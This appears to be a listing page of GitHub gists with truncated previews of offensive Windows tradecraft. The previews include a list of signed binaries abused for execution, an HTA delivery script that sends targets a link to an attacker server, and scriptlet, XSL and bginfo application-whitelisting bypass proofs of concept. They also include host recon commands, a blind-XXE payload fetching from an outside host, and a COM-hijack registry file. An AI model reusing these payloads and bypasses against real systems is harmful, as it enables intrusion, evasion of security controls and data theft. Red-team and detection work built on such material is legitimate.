This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Rundll32.exe | |
Regsvr32.exe | |
Mshta.exe | |
Msbuild.exe | |
Cbd.exe | |
Csc.exe | |
Tracker.exe | |
Ntsd.exe | |
Bginfo.exe | |
Kd.exe |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.IO; | |
using System.Text; | |
using System.IO.Compression; | |
using System.EnterpriseServices; | |
using System.Collections.Generic; | |
using System.Runtime.InteropServices; | |
using System.Security.Cryptography; | |
/* |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# Demonstrate how to queue tasks to execute with each checkin... | |
# | |
# | |
# yield tells a function to pause and return a value. The next time the same instance of the | |
# function is called, it will resume after where it last yielded. | |
# | |
sub stuffToDo { | |
# Tasks for first checkin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta | |
To change your server, simply find and replace 192.168.1.1 with your server in the code. | |
#> | |
<# | |
Moving Credtis for CACTUSTORCH HERE | |
I was in escape sequcence hell ;-) | |
' ( ) ( ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows version: | |
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | |
Users who have authed to the system: | |
ls C:\Users\ | |
System env variables: | |
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment | |
Saved outbound RDP connections: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
progid="PoC" | |
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
<!-- Proof Of Concept - Casey Smith @subTee --> | |
<!-- License: BSD3-Clause --> | |
<script language="JScript"> | |
<![CDATA[ | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0"> | |
<!-- Copyright (c) Microsoft Corporation. All rights reserved. --> | |
<xsl:output method="text" omit-xml-declaration="yes" indent="no"/> | |
<xsl:strip-space elements="*" /> | |
<ms:script implements-prefix="user" language="JScript"> | |
<![CDATA[ | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'PoC code: Application whitelisting bypass using bginfo | |
'Author: @oddvarmoe - http://oddvar.moe | |
strProgram = "cmd.exe" | |
strPath = "C:\windows\system32" | |
Set fso = CreateObject("Scripting.FileSystemObject") | |
strCommand = fso.BuildPath(strPath, strProgram) | |
Set app = CreateObject("Shell.Application") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows Registry Editor Version 5.00 | |
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00] | |
@="AtomicRedTeam" | |
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID] | |
@="{00000001-0000-0000-0000-0000FEEDACDC}" | |
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam] | |
@="AtomicRedTeam" | |
[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID] | |
@="{00000001-0000-0000-0000-0000FEEDACDC}" | |
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] |